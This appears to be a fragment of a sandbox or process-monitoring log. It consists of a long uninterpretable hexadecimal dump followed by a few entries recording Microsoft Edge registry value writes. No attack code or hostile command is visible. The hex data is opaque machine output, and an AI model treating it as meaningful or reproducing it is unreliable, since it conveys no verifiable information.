283025150001171600b8823b010105050104464200212407020531300490881800a9b1180068533a01212102020034300490881800a9b1180068533a012121000090881800a9b1180068533a01015e5b045f6b3c0806545072700000000101000001090901084a420001080801096b6200010b0e040a3e390d0a78747671090c04087a76747363623221041d0815617d091571630715213206152723f100cc2c0001010000130c1f00a0bf1f002099b90000000000111e09060f6b6c080f3b32060f3d397b90cc2c00010100003a1a200058782000378eb9000000000009131c061a2e3b0f1a6864f6f464637380cc2c0001010000bd9d20006746210053eab900674621000107040206545052590d050104262200e0cc2c0001010000e7c32400725725008930b900725725000103030102525000010c09040d393e0a0d7f7456510c09040d393d090d3f34565114100515218eba1514b9b8065650000113140612667c08122633071220395b51010000011d100c1c7874101c485b0f1c283a0e1c6e6ae8e6f6f4c4c2d2d0607101000001141d08157176121521251115a7bceeec7c7b5b5106050207069a9b01010000010100000101000001080b02093b3735311d100c1c78680c1c485f0b1c283e0a1c2e2ae8e6f6f4c4c2d2d0607118130a196d7d09197d6c08194d5307192d3206192b27f5f117040206343032d0cc2c0001010000d6ec3a00ecd63a00a118b90000000000010b0e040a3e32060a3834766900130a19fded09196d7c08197d6307192d3206192b27e510cc2c00020200004b763d00a9943d00b70eb900e8d53d002f123d00eed33d00d26bb9000000000001121b081327380c13415efcfaeae87877676656510e0b040f3b32060f3d397b7119120a187c680c184c5f0b182c3e0a184a46e4e2f2f060711310021260795b510a0a010b696200011c110c1d697f0b1d796e0a1d495d091d293c081d2f2be9e7f7f5d5d11e0b040f3b32060f3d397b90cc2c0001010000dd994400e7a34400eb52b90000000000110d160a1c786b0f1c283a0e1c6e6ae8e6f6f4c4c2d2d06090cc2c0001010000266345007a3c460005bfba0000000000090f040206343032d0cc2c0001010000f4be4a00014a4b0001010000014a4b00010b08020a38343631080b02099b905251080b02097b7052411e0b040f3b32060f3d397b90cc2c0001010000e5ab4e00f5bb4e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c00010100009dd34e00b3fd4e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c00010100003d734e006d234e00eb52b90000000000111e0b040f3b32060f3d397b90cc2c0001010000256a4f00337c4f00eb52b90000000000010e09060f6b63070f3b32060f3d397b71040702057175010118130a196d7b0f197d6a0e194d590d192d380c198b87f5e10b0e040a3e33070a3834767105050104666200193727091d79a0c41d29f7c31d1cbfbe0eeeec7c7b5b5000e052b200e0e505000118130a196d7f0b197d6e0a194d5d09192d3c08194b47f5e11d160a1c2820141caea7e5e3f3f1c1dfcfcd7d7c6c6b5b511c110c1d69790d1d79680c1d495f0b1d293e0a1d4f4be9e7f7f5d5d93c2c0913270d39131231300cfcfaeae878776766565000e052b20070710100111b0e040a3e33070a38347690cc2c0001010000aec769000c666a002298ba0000000000193c2f0a1642451116222410166460e2e0f0eececc7c7b6b8052b20038380000010704020674703229322c071a6e80f41a2ec7f31a1bf1f00b5b5000e052b20070770700010e09060f3b380c0f7d7a7877676656411e0b040f3b32060f3d397b90cc2c0001010000690b620072106200eb52b90000000000010e09060f6b6f0b0f3b3e0a0f7d797b7118130a196d790d197d680c194d5f0b192d3e0a196b67f5f117040206343032d0cc2c0001010000522371006918710078c2ba0000000000011d170b1c6863171c7872161c4841151c2820141c1d131215f5e00001141d0815617c081571630715213206152723f1e1151c0814706c0814405307142032061426226071060601074542001101170710928efcfadad8c8c676756564343000e0cc2c00010100004b3f7400453075003b81ba0000000000111e0b040f3b32060f3d397b90cc2c0001010000bac87200d0a27200eb52b90000000000111704020634307290cc2c0001010000ed94790003797a005fe5ba0000000000111b0e040a3e32060a38347690cc2c0001010000afd27d00c5b87d005fe5ba000000000001141c091561710515716004154157031521360215f5e00019061a050d0c898806e6e4c4c2525000e052b200000404002109220a28dc778320f45084186cf1851074e286083cb38720a080007bfb8000e8a940012121000020a080007bfb8000e8a940010116110617435f0b172521e3e1f1ef7f5134130615d1ce0a0d696d0905313c08502f7f0067187f003476430121210000502f7f0067187f0034764301190a120104a6a200e052b20040400000010b0e040a3e3e0a0a787476693420382a6b60141b7f77131723261213203dbcb8faf8e8e6d6d4c4c2525000e052b20050500000010e09060f6b75110f3b24100fddd97b693420584a6b60141b7f77131723261213405dbcb8faf8e8e6d6d4c4c2525000e052b200585800000115120614706307142032061426226061041d0815617e0a15716d0915213c08154743e110cc2c000101000018958d0065e88d0078c2ba0000000000010704020634303221051c0814706a0e1420380c146662e0feeeec7c90cc2c00020200009a0a9000e0709000912bba00000000005dcd9000ee7e9000ab11ba0000000000111b0e040a3e3c080a58547690cc2c000101000072e39100f1609100c47eba0000000000010f0c020e3c383a31191e06184c5307182c3206182a2674711e0b040f3b32060f3d397b90cc2c000101000061f49500bc299500dd67ba00000000000107040206343052410a110a1b7f680c1b2f3f0b1b2925e7e5f5f3c3c1d1cf7f90cc2c0001010000821e9c00b22e9c00f74dba000000000001161d0a1723231717a5a2e0feeeecdcdacac878776766564931220a1a2e2c181ae8e2e0feeeecdcdacac87877676656b052b20070700000193424091b4fc492192fba8c191a8b880ceeec7c7b6b6000e052b2004054140019283a0b1f4bc2941d2ba0961d1e8f8c10e2e0f0eececc7c7b6b6000e052b20060741400010b09030a626a0204a6a200111e0b040f3b33070f3d397b90cc2c0001010000fe58a60008afa7000eb5bb000000000001090a02089a9634293f2f091870660e14151f1e09e9e7777666653534545000e052b200d0d000000107040206141032310a08030b636d0507c5c20001090901086a6200111e0b040f3b32060f3d397b90cc2c000101000015beab0055feab00dd67ba000000000001050501048682000105050104060200011a13081b6f7d091b7f6c081b2f33071b292644590609060f6b6d090f3b3c080f3d397b90cc2c00010100009223b1009928b100269dbb009928b10009030e040a3e32060a38347690cc2c00010100006ddfb200a012b20060dbbb00a012b20001030301023230000105050104161200010100000000000001010000000000000000000018322a0000000000c88d44010000000000000000000000000000000002020000e0a54401084e470100000000000000000000000010100000e8b0590100000000ff000000ff0000001818000020092900000000000000000000000000000000001049580100000000ff000000ff00000018180000e0c929000000000000000000000000000000000018322a000000000050164701000000000000000000000000000000000303000070364701e0a54401084e470100000000000000000000000000000000000000003861580100000000ff000000ff0000001818000080a92900000000000000000000000000000000000000000000000000b8495ccd60000000e6a04701010100000303000003030000c88e4701d4924701e0a64701302b1b00f0e91900405b1b00edab4701f2b44701f6b0470100000101020242016d4a08006c6907071d7472071b6e73071b1f7000387f4601000000000000000002484b0100c0c00080c94801000000000000000096dc4b01488ac2000000000000000000000000000000000000000000c089480100000000c881480100000000d69f480100000000e4ad480100000000f2bb4801000000006c234e01000000005e114e01000000004a054e010000000038774e0100000000a2e84b0100000000b6fc4b0100000000d09a4b0100000000e4ae4b0100000000004b4a01000000001e554a010000000032794a0100000000460d4a010000000062294a01000000007c374a010000000092d94a0100000000a8e34a0100000000c2894a0100000000d8934a0100000000eca74a0100000000feb54a0100000000125e4d0100000000206c4d010000000038744d01000000004c004d01000000005e124d01000000006e224d01000000007e324d010000000096da4d0100000000aee24d0100000000c68a4d0100000000eea24d0100000000fab64d010000000008454c0100000000165b4c0100000000206d4c01000000002e634c0100000000400d4c0100000000521f4c0100000000602d4c0100000000763b4c01000000008cc14c0100000000a2ef4c0100000000b8f54c0100000000c4894c0100000000d09d4c0100000000e0ad4c0100000000eca14c0100000000004e4f0100000000105e4f0100000000226c4f01000000002c624f010000000038764f0100000000440a4f010000000056184f010000000068264f010000000082cc4f01000000009cd24f0100000000aee04f0100000000bef04f0100000000cc824f0100000000de904f0100000000eaa44f0100000000f8b64f010000000008474e0100000000145b4e010000000028674e01000000007c334e0100000000000000000000000086cc4b0100000000743e4b010000000062284b01000000004e044b01000000003a704b01000000002e644b0100000000105a4b01000000000000000000000000c0c4573f09001570bbb9452b030d030d2d2d00030c63c2c0452b030d030d2a3417006500c6c4452b030d030d20230c086b00cdcf452b030d030d393b02030c086b004b0e171c0b097f011c4a08006c00cecf483a302f0519120d0e131622291d1f0c1535371708050d030e0965003b38740403021b071a1231578c8e513611372f0519120d0e13162025151561001819462211372f0519120d0e1316202515156100d5d545281d040d3a2f0519120d0e131664004949432f031c16262f0519120d0e131664002a284d3f150b2d2f0519120d0e1316645506161761011c4a08006c00181c5626182f221104010717262c011a111d0c741f1b562618202300041e0536331b0d171d06012b2b1a060b790026225626183a3f1b0601140d393b191e070a6400e2e6513b06090f0a080901213d1b0615041d0601282f051811177200b3b7573611213b06090f0a080901213d1b0615041d0601282f0518111772c6c746221137360700170b1a24221d0c06160073ceca5031171f04070f151135221d0c061600730006054a3a23221d0c0616001c1d3423041501071735221716160b1a74a9aa522410170b29351714091d1f0c0f0d06262c1a1b1a111772c7c646221137360700170b1a24221d0c0616003a2d64cbca46221137360700170b1a203c1a1704052d2d64008082452211272a0a071108393d04082432352f0509313d040865efed4b27071d1d080d05131f361f251a073c2d04056402014a3a372107171200021722221716160b1a746a68452211272715130601053927080938571e1c45221139220b1119092d290f0a08093257002521562618393b191e070a213d78f1f34b271a11171e030c080e01222a19061b3b1f251a077421255626183c33373b292f05092d2d0405011772b4b75133081a16203d1b0615041d06016e00080a452211382d12073137001d1d72008084573611382d12073137001d1d7200f2f2452b1a111731311b1d1d0a020d3f3606171d06016e003b384f2904171326311b1d1d0a020d3f3606171d06016e00d2d244210909111126311b1d1d0a020d3f3606171d06016eebe94b27071d1d080d05131f26311b1d1d0a020d3f3606171d06012f2f0a372319072d2c1a1b1a74d3d750381f322d00030c6300d5d150381f34221122370d191065d6d250381f20361122370d191065d4d050381f353417006568694734170029250b1013130b794c4e45221124221d0c22250016171600730040434f230e0528250b1013130b3c3d2f57001f1e443d111d24221d0c061600731d1f45221139220b1119092d290f0a0809203d2f5700191b45221139220b111909232f05092b2f0c08244100696a4e3819181d2b3b0d11313b383e0d01262b0913722025523e0d01262b0913263b223819181d2b3b0d1165d7d54a2d0411363417006500d3d14a2d0411312d00030c632f2c4f0f0e2c112327061b07093057003435472f070a272f031c16653938472f070a222f1b0107322f0509203d3941004948472f070a2a2b1d0c322f050924410c0f4a3a25370d050d272c0b0135310602656e6f46221135021350003e3c4522113b0a080e13500078794622113713192708096f8c8d462211372c02000c0f0a2825070b24418d8c462211372c02000c0f0a2825070b3257e1e0462211312b181f1b1d0103080b1a2727061b070914245700676647341700202b181f1b1d0103080b1a2727061b0709142457515345221124221d0c0616003b2d041170006b694522112727102c290f0a08096500fafb462211322f0509312d09156570724522112727061b0709332d0915325700dcde4a2d0411233a131f6500dad84a2d04112237242d00030c6394905736112727102c290f0a08096500343152251b1d11232f0509655d5c472a19061b2e2f0509273713000317017300a0a1462211372c011d1c030926135000b2b3462211372c011d1c030928220b0165007571573611322f0509353f06071a1117373d78005252432f031c162d290f0a080965333652251b1d11262c011d1c030932578f8f433117041511232f050932570000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000032907df2b4b22b00cd907df2b4b22b0000000000ff00000001010000020200002f0f2000000000000000000000000000ff000000fd020000ff000000f30c00000808000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000001000000000002000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000610301070103010f010301070103011f010301070103010f01037a0000000000410301070103010f010301070103011f010301070103010f01035a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000050005181810100000103060c080000000000000000000000a4a7030060e2fbfba321000000000000a679df0000000000a104a50000000000811e7f1cfc000000403efe7cfc000000a8ab0300c1627979832000000000000000000000000000000000000000000000817ffe000000000040befe0000000000b5b60300c1627979832000000000000000000000000000000000000000000000817ffe000000000041bffe0000000000b6b50300cf6d4646b81ae5474a4af95b00000000000000000000000000000000817ffe0000000000403edf5ffe00000051540500518b8484fa205f85b0b0e8320000000000000000000000000000000081520b063e19f900314fff7ffe00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000001000000000002000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000610301070103010f010301070103011f010301070103010f01037a0000000000410301070103010f010301070103011f010301070103010f01035a000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c01fdf808101000001010000000000000101000000000000000000000101000000000000000000000000000000000000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae578181010000000000000000000000000000000000000000000000000000f8ae5781810100000000000000000000000000000000000000000000000000000000000000000000000000000000000010485981810100000000000000000000000000000000000040a2e28081010000c023e380810100004098d8808101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000090c554818101000050005181810100004343000000000000000000000000000000000000000000000000000001212000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000022220000101000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000222200002020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000fe010000ff000000a8f0598181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a8181010000147f6a81810100007f00000000000000d3f459818101000018736a818101000018736a818101000018736a818101000018736a818101000018736a818101000018736a818101000018736a81810100002e2e00002e2e0000fe01000000000000ff000000000000000101000000000000000000000000000075ed9800000000000000000000000000f4f5010000000000b87bc3808101000000000000000000002e117e173403053b3e0d00030c2333071024004000000000b87bc3808101000000000000000000002e117e17331d1b0615041d06012e33071024004000000000b87bc3808101000000000000000000002e117e173403053b3e1300131826310b122833090b09131c2833071024004000b87bc3808101000000000000000000002e117e17220d09153a360708092f00400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003025150001171600b8823b0101171600aeb81600ccf63b01aeb81600bdab1600e4de3b01bdab160091861700f8c23b0191861700c0d717000c373a01c0d717003f2718001c273a013f271800594118002c173a0159411800667e18003c073a01667e180088901800546f3a0190881800a9b1180068533a01a9b11800170e1900704b3a01170e1900465f190084bf3a01465f1900756c190084bf3a01756c1900a4bd190084bf3a01a4bd1900ccd5190084bf3a01ccd51900e6ff190084bf3a01e6ff1900edf4190098a33a01f0e9190022391b00a8933a01405b1b00869d1b0068533a01c0db1b00e1fa1b00b8833a01e4ff1b0018041c00286b420118041c00e9f51c00c4ff3a01ecf01c00ffe31c0068533a01001d1d009b861d00bc873a019c811d0009171e00ccf73a010c121e007d631e00d8e33a0188961e00d8c61e0068533a01d8c61e0003232000e4df3a010424200086a62000102c3d0188a820007d5c210038043d0180a12100d4f5210020614001d4f52100113322003c033e011c3e2200587a2200286b4201587a220091b3220068533a0194b62200c8ea220068533a01c8ea2200ddff220068533a01e0c22200082b230068533a01082b23001d3e230068533a012003230081a223002061400184a72300b497230068533a01b4972300c8eb230068533a01c8eb230011352400286b420114302400ddf9240090ac3d01e0c42400795c250068543d017c592500a0852500286b4201a0852500cbee2500286b4201cce925001b3d2600286b42011c3a26003315260068533a0134122600e0c626009ca03d010c2b27002700270068533a01381f27007d552800a8943d0180a82800cae228003c033e01cce42800163f29003c033e01200929005f762900286b420180a92900bf962900286b4201e0c92900153f2a00286b42012c062a006e442a00704d3c01705a2a0090ba2a00185d440190ba2a00b09a2a00185d4401c4ee2a008aa62c00b8843d01ac802c00d7fb2c00286b4201e0cc2c00dbf52e00ccf03d01dcf22e000e212f0068533a01103f2f00240b2f0068533a01240b2f0036192f0068533a0138172f0058772f0068533a0158772f0068472f0068533a0168472f0092bd2f00286b4201b09f2f0050613100e8d43d0150613100ddec31000c4d4001e0d1310005373200286b4201083a3200dfed3200ecd03d01f0c2320014273300003d3c0120133300380b330008353c0140733300417233000c313c015063330051623300102d3c01546733007340330068533a0174473300c1f23300286b4201c4f733007c4834003c033e017c483400bb8f340068533a01bc883400deea340068533a01e0d4340026133500286b4201281d35005f6a3500286b420160553500281f37001c213c01281f37007c4b3700704d3c017c4b3700d0e73700704d3c01d0e73700241c3800704d3c01241c38008bb338003c033e018cb43800033a390020614001506939008eb7390014293c01b48d39002a103a0038053c012c163a0078423a003c033e0188b23a00c8f23a00704d3c01c8f23a00fcc63a00506d3c0118233b00a5993c0020614001b4883c00201e3e007c413c01201e3e0069573e00286b42016c523e00d8e63e00704d3c01043b3f00c0804000043a3f01c080400021604100286b4201246541009ad84200bc813c019cde4200084b4300704d3c01084b430001454400dce13c010440440045014400d0ed3c01480c44006226440068533a01642044007e3a440068533a0180c44400b8fc440068533a01c0844400fbbf4400201e3f01fcb844009bdd4600447a3f019cda4600763e4800043a3f0188c04800c28a4800fcc13c01044d49004c054900f4c93c016029490083ca490068533a0184cd490094dd490068533a0198d14900e9a04900286b4201f4bd490082c84a00286b420198d24a00ace64a0068533a01ace64a00bcf64a0068533a01d09a4a00e0aa4a0068533a01e0aa4a00074c4b00744a3f0108434b00450e4b0094aa3f0148034b00a6ed4b00286b4201a8e34b00074b4c00286b420108444c005d114c0068533a01602c4c00d5994c00286b4201d8944c0068254d00704d3c0168254d00b0fd4d00286b4201cc814d00034d4e00286b4201206e4e007f314e00f4ca3f0180ce4e00c58b4e00d0ee3f01c8864e0007484f00ac923f0108474f00450a4f0018273e0148074f00154550009ca23f01184850003868500094aa3f01386850002d7c5100a49a3f013061510097c65100704d3c0198c95100d9885100286b4201dc8d510070225200704d3c01702252000f5c53003c033e0110435300491a530068533a014c1f53006e3d530068533a0170235300104555001c213c011045550065305500704d3c01683d5500bde85500704d3c01c095550015435600704d3c01184e560080d656003c033e0180d65600f8ae560020614001f8ae5600e7b05700546b3e01e8bf57004d1558003c033e015008580087df58004c733e0188d058000d5459006c533e011049590051085900286b4201540d5900aff55a0080bf3e01b8e25a005f045b00a09f3e01603b5b007e255b0078473e0180db5b00c69d5b0068533a01104c5c005e025c00704d3c01603c5c0080dc5c0068533a0180dc5c00a0fc5c0068533a01b4e85c00bde35e00b8873e01c09e5e00d08f5f00d0ef3e01d08f5f007c1d6100ecd33e017c1d610043216200206140014c2e620084e6620084c4410184e662009bff64003c033e019cf86400197c6500501041011c796500acc9650020614001acc965008ee967005818410190f76700452c690074344101482169006f06690068533a01701969002f456a000c4c4101305a6a00d7bb6c0030704101d8b46c004d206d00a8e8410164096d0089e46d0068533a018ce16d008fe16e00b8f8410198f66e002d426f0020614001305f6f004c236f0068533a0158376f0043337000f0b04101443470003f4e71000c4d4001403171007b0a7100d09041017c0d7100bccd7100704d3c01bccd71005022720020614001502272009fed72003c033e01a0d27200e597720068294001e89a72001665730034754001384b7300d1a475003c7d4001fc89750041377600704d3c014c3a760094e37700546b3e019ceb7700cdba7700286b4201d0a7770001797800286b4201047c78002a52780068533a012c5478004b32790038053c014c357900a7de7900286b4201ccb5790013697a008ccd4001146e7a0043397a0068533a01d0aa7a00463a7c0020614001700c7c00a6da7c0094aa3f01d0ac7c0078057d0068533a0178057d00e8957d00aced4001e8957d00502e7e00704d3c01502e7e0017687f00d091400118677f004a357f0068533a01502f7f0067187f003476430167187f001b9b8000440643011b9b80001c9c80006022430120a080007bfb8000e8a940017bfb800037b483000042430137b4830054d783002466430154d7830026a28400704d3c0128ac8400c642840070324301d054840066e3850080c2430168ed85007ffa850068533a018005850031b687008cce430134b387008f058a00c4864301901a8a0026ad8b00b4f6430128a38b0061ea8b0068533a0164ef8b00e66d8b00704d3c01e8638b007df18c0020614001800c8c00d05c8c00ecae4301d05c8c00870a8d00fcbe4301d05d8d008a048e000c4d40018c028e00018e8f0068533a01048b8f0063ec8f0068533a0164eb8f00db548f003c033e01dc538f0027b79000286b420134a4900018899100307342011889910057c691005010410158c991000a9892006c2f42010c9e92004cde9200286b42014cde920056c5930090d3420158cb9300c457930094aa3f01c45793001a8e94003c033e011c88940024b1950098db420144d19500d0459500a8eb4201d045950061f79600eca8450164f296006cf498001c5845016cf4980071e899003c78450174ed9900900a9a003c784501900a9a00029e9c005c18450104989c00f06c9c00d4974201f06c9c00d14e9f0004404501e07f9f008b2ea50080c445018c29a5002583a6003c033e013096a600b315a600704d3c01b412a6001dbaa7008cc845012087a70079dea700c4ff3a017cdba700e146a700b0f44501e443a7009d35a8003c033e01a008a800c76ea900b8fc4501d079a90040eaaa00d89c450140eaaa0060caaa0078473e0160caaa00f65caa00e0a44501f852aa0069c2ab00f4b045016cc7ab000da1ac00eca8450110bcac00ca66ac00704d3c0110bdad004be6ad00185d44014ce1ad006cc1ad0068533a01802dad00903dad0020654401d07dad00f75aad00185d4401f855ad00fe4eb000286d440100b1b1002e9fb10068533a013081b1004dfcb100286b420150e1b100cc7db1003c794401cc7db100eb5ab100286b4201ec5db100fd4cb10068533a0160d2b200ad1fb20064214401e052b200fd4fb20068533a0100b3b30059eab30088cd440170c3b300c172b30090d54401e053b30015adb80098dd44013088b800f74fb800a0e5440110a9b90012abb900c8f43d012099b900378eb900cc8f4201378eb90053eab900cc8f420153eab9008930b900605c3d018930b900a118b90088b43d01a118b900b70eb900cc8f4201b70eb900d26bb900cc8f4201d26bb900eb52b900cc8f4201eb52b90005bfba00cc8f420105bfba002298ba00cc8f42012298ba003b81ba00cc8f42013b81ba005fe5ba00cc8f42015fe5ba0078c2ba00cc8f420178c2ba00912bba00cc8f4201912bba00ab11ba00cc8f4201ab11ba00c47eba00cc8f4201c47eba00dd67ba00cc8f4201dd67ba00f74dba00cc8f4201f74dba000eb5bb00cc8f42010eb5bb00269dbb00cc8f4201269dbb0052e9bb00cc8f420160dbbb00803bbb00cc8f4201000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000094dd49006029490084cd490094dd4900f4bd490094dd49004821690094dd490064096d007c0d7100403171004c1f530010435300eca549004c236f00305f6f00cc814d0068254d0094dd490094dd4900104959005008580098d149004c05490018485000a0fc5c0068ed85002c5478004c357900ccb57900d079a9004ce1ad0036360000474700004a4a00004e4e0000505000004e4e0000575700004e4e00005d5d00000b0b0000131300005959000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101181800001818008080000000000000000000000000000101020200003030008080000000000000000000000000000101090d04004848000060f091017d7c0100000000000000000000000000000000003c034715014c561317011a0601531a161f1e1707450b0d0c0b0d07095a1a7201126b151f075307150f0a050d03010b581a5e1c165418013307365d120016080f0e1559581501021d4e1a52071c5449100b0d080c125e40040a111d1c1c0912594e0c02575b121e43584716074d0c0f070f031607223317011a0601531a161f1e171933072a001c48060706073d2708094f581501021d4e1f57071c5449100b0d080c125e40040a111d1c1c0912594e0c02575b121e435845111c33072a0000001c4f160616071b1d0d4733072a00000000001c4e171404101607110134221b1f1f05090202164d33072a000000000000001c4e1714041016071101213d1d0616011d060122291313094c4c09131309511a46123a271819040e175507551c2822000616004e1a41070d1f1642070f1133072a00000000001c135d171404101607110134221b1f1f05090202164d33072a0000001c135c160616071b1d0d4733072a001c135b060706073d27080951330736134e120016080f0e154733070a0000000000000000000000000000000000000000000000000000000000000000000000c0c0000c0d0100882a323212121a1a62627a7a42424a4ab2b3bbbb8b8b93939b9bfbfbc3c3cbcb23232b2b333313131b1ba3a4acacb4b4bcbcf4f5fdfdc5c5cdcdd5d5dddd25252d2d35353d3d05050d0d15151d1d65656d6d75757d7d45454d4d55555d5da5a6aeaeb6b6bebe86868e8e96969e9ee6e6eeeef6f6fefec6c6ceced6d6dede26262e2e36363e3e06060e0e16161e1e66666e6e76767e7e46464e4e56565e5ea6a7afafb7b7bfbf87878f8f97979f9fe7e7efeff7f7ffffc7c7cfcfd7d7dfdf27272f2f37373f3f07070f0f17171f1f67676f6f77777f7f47474f4f57575f5fa7a8a0a0b8b8b0b08888808098989090e8e8e0e0f8f8f0f0c8c8c0c0787f4f4f5f5f5757af0000d0d0001011010000a0a8a8b0b0b8b8808088889898e0e0e8e8f0f0f8f8c0c0c8c8d0d028283838000008081010181860606868707078784040484850505858a0a1a9a9b1b1b9b98181898991919999e1e1e9e9f1f1f9f9797f47474f4f5757e7e8e0e0f8f8f0f0c8c8c0c0d8d8d0d02828202038383030080800001818101068686060787870704848404058585050a8a9a1a1b9b9b1b18989818199999191e9e9e1e1f9f9f1f1c9c9c1c1d9d9d1d1292921213939090901011919111169696161797971714949414159595151a9aaa2a2babab2b28a8a82829a9a9292eaeae2e2fafaf2f2cacac2c2dadad2d22a2a22223a3a32320a0a02021a1a12126a6a62627a7a72724a4a42425a5a5252aa0000e0e00070710100c86c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdcdcddddd2d2d3d3d0d0d1d1d6d6d7d7d4d4d5d5dadaebebe8e8e9e9eeeeefefececedede2e2e3e3e0e0e1e1e6e6e7e7e4e4e5e5eaeafbfbf8f8f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5fafa0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757aff0f0008484000008a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5a828f9f9fefefffffcfcfdfdf2f2f3f3f0f0f1f1f6f6f7f7f4f4f5f5faf000101b4b5010000a0b0b080809090e0e0f0f0c0c0d0d020203030000010106060707040405050a0a1b1b181819191e1e1f1f1c1c1d1d121213131010111116161717141415151a1a2b2b282829292e2e2f2f2c2c2d2d222223232020212126262727242425252a2a3b3b383839393e3e3f3f3c3c3d3d323233333030313136363737343435353a3a4b4b484849494e4e4f4f4c4c4d4d424243434040414146464747444445454a4a5b5b585859595e5e5f5f5c5c5d5d525253535050515156565757545455555a5a6b6b686869696e6e6f6f6c6c6d6d626263636060616166666767646465656a6a7b7b787879797e7e7f7f7c7c7d7d727273737070717176767777747475757a7a8b8b888889898e8e8f8f8c8c8d8d828283838080818186868787848485858a8a9b9b989899999e9e9f9f9c9c9d9d929293939090919196969797949495959a9aababa8a8a9a9aeaeafafacacadada2a2a3a3a0a0a1a1a6a6a7a7a4a4a5a5aaaabbbbb8b8b9b9bebebfbfbcbcbdbdb2b2b3b3b0b0b1b1b6b6b7b7b4b4b5b5babacbcbc8c8c9c9cececfcfcccccdcdc2c2c3c3c0c0c1c1c6c6c7c7c4c4c5c5cacadbdbd8d8d9d9dededfdfdad30310110100000882d05050d0da500005051015050000078da32357d7d5d5dbdbe9e9efefe2e2e06060e0e16164e4e5656b6b8b0b08888808098989090e8e8e0e0f8f8f0f0c0c0d8d8d0d0282820203838303008084040b8b99191c1c1a900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
